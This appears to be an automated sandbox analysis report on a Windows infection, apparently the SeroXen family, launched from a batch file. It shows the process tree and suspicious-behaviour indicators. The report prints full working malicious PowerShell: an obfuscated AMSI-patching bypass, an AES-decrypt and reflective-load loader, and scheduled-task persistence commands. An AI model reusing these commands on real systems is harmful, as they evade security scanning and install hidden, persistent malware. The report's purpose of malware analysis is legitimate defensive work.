msedge.exepid process 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
svchost.exepid process 2668 svchost.exe 2668 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 2992 wrote to memory of 1900 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 1900 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 1900 2992 cmd.exe powershell.exe PID 1900 wrote to memory of 4684 1900 powershell.exe powershell.exe PID 1900 wrote to memory of 4684 1900 powershell.exe powershell.exe PID 1900 wrote to memory of 4684 1900 powershell.exe powershell.exe PID 1900 wrote to memory of 4116 1900 powershell.exe WScript.exe PID 1900 wrote to memory of 4116 1900 powershell.exe WScript.exe PID 1900 wrote to memory of 4116 1900 powershell.exe WScript.exe PID 4116 wrote to memory of 2640 4116 WScript.exe cmd.exe PID 4116 wrote to memory of 2640 4116 WScript.exe cmd.exe PID 4116 wrote to memory of 2640 4116 WScript.exe cmd.exe PID 2640 wrote to memory of 3544 2640 cmd.exe powershell.exe PID 2640 wrote to memory of 3544 2640 cmd.exe powershell.exe PID 2640 wrote to memory of 3544 2640 cmd.exe powershell.exe PID 3544 wrote to memory of 2200 3544 powershell.exe schtasks.exe PID 3544 wrote to memory of 2200 3544 powershell.exe schtasks.exe PID 3544 wrote to memory of 2200 3544 powershell.exe schtasks.exe PID 3544 wrote to memory of 1312 3544 powershell.exe Client.exe PID 3544 wrote to memory of 1312 3544 powershell.exe Client.exe PID 3544 wrote to memory of 1312 3544 powershell.exe Client.exe PID 3544 wrote to memory of 2508 3544 powershell.exe install.exe PID 3544 wrote to memory of 2508 3544 powershell.exe install.exe PID 3544 wrote to memory of 2508 3544 powershell.exe install.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 3440 wrote to memory of 4864 3440 powershell.EXE dllhost.exe PID 4864 wrote to memory of 616 4864 dllhost.exe winlogon.exe PID 4864 wrote to memory of 680 4864 dllhost.exe lsass.exe PID 4864 wrote to memory of 960 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 64 4864 dllhost.exe dwm.exe PID 4864 wrote to memory of 428 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1020 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1132 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1140 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1152 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1164 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1232 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1256 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1376 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1408 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1508 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1548 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1564 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1664 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1712 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1720 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1800 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1816 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1916 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1928 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1980 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1044 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 1832 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 2148 4864 dllhost.exe spoolsv.exe PID 4864 wrote to memory of 2272 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 2348 4864 dllhost.exe svchost.exe PID 4864 wrote to memory of 2408 4864 dllhost.exe sihost.exe PID 4864 wrote to memory of 2416 4864 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ff8c2f20-6fe3-4046-b120-ef0108448bfb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FcXqNBxGrfcD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$knTEfVObbjgPTl,[Parameter(Position=1)][Type]$pjUzxCRTiE)$wyoMSFNzdPL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+'a'+'s'+''+'s'+'',[MulticastDelegate]);$wyoMSFNzdPL.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$knTEfVObbjgPTl).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$wyoMSFNzdPL.DefineMethod(''+'I'+'n'+'v'+'ok'+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+'l',$pjUzxCRTiE,$knTEfVObbjgPTl).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $wyoMSFNzdPL.CreateType();}$RPlafvtcSCSiX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+'3'+'2'+''+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+'t'+''+[Char](104)+''+'o'+'ds');$gXLYzRsyhhTsLI=$RPlafvtcSCSiX.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oLDlYUeEBEFDnqbDoVZ=FcXqNBxGrfcD @([String])([IntPtr]);$reHkBdnrxRSsxmgmNsjJFy=FcXqNBxGrfcD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VywWsZUgyeE=$RPlafvtcSCSiX.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$EciTNMnxNGknba=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$VywWsZUgyeE,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$DMUkRNwwedjYRcVeD=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$VywWsZUgyeE,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'ot'+'e'+''+'c'+'t')));$qjTTsuo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EciTNMnxNGknba,$oLDlYUeEBEFDnqbDoVZ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$ZCUuqwZEdfKQBlAjm=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$qjTTsuo,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iS'+[Char](99)+'a'+[Char](110)+'B'+[Char](117)+''+[Char](102)+'f'+[Char](101)+'r')));$dOPsIXoubi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMUkRNwwedjYRcVeD,$reHkBdnrxRSsxmgmNsjJFy).Invoke($ZCUuqwZEdfKQBlAjm,[uint32]8,4,[ref]$dOPsIXoubi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZCUuqwZEdfKQBlAjm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMUkRNwwedjYRcVeD,$reHkBdnrxRSsxmgmNsjJFy).Invoke($ZCUuqwZEdfKQBlAjm,[uint32]8,0x20,[ref]$dOPsIXoubi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+'RE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV00YZkMqK2WikDyAFyEbHtVHlk19tlqai4+2KYGz1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ohwcqqva4JCO7DLoEbGU5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VRfwB=New-Object System.IO.MemoryStream(,$param_var); $vPQnJ=New-Object System.IO.MemoryStream; $UUurH=New-Object System.IO.Compression.GZipStream($VRfwB, [IO.Compression.CompressionMode]::Decompress); $UUurH.CopyTo($vPQnJ); $UUurH.Dispose(); $VRfwB.Dispose(); $vPQnJ.Dispose(); $vPQnJ.ToArray();}function execute_function($param_var,$param2_var){ $HBxgS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KZtfv=$HBxgS.EntryPoint; $KZtfv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gmyEL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($fSioa in $gmyEL) { if ($fSioa.StartsWith(':: ')) { $llpNM=$fSioa.Substring(3); break; }}$payloads_var=[string[]]$llpNM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_642_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_642.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_642.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_642.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV00YZkMqK2WikDyAFyEbHtVHlk19tlqai4+2KYGz1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ohwcqqva4JCO7DLoEbGU5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VRfwB=New-Object System.IO.MemoryStream(,$param_var); $vPQnJ=New-Object System.IO.MemoryStream; $UUurH=New-Object System.IO.Compression.GZipStream($VRfwB, [IO.Compression.CompressionMode]::Decompress); $UUurH.CopyTo($vPQnJ); $UUurH.Dispose(); $VRfwB.Dispose(); $vPQnJ.Dispose(); $vPQnJ.ToArray();}function execute_function($param_var,$param2_var){ $HBxgS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KZtfv=$HBxgS.EntryPoint; $KZtfv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_642.bat';$gmyEL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_642.bat').Split([Environment]::NewLine);foreach ($fSioa in $gmyEL) { if ($fSioa.StartsWith(':: ')) { $llpNM=$fSioa.Substring(3); break; }}$payloads_var=[string[]]$llpNM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9a88c46f8,0x7ff9a88c4708,0x7ff9a88c47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:83⤵
-
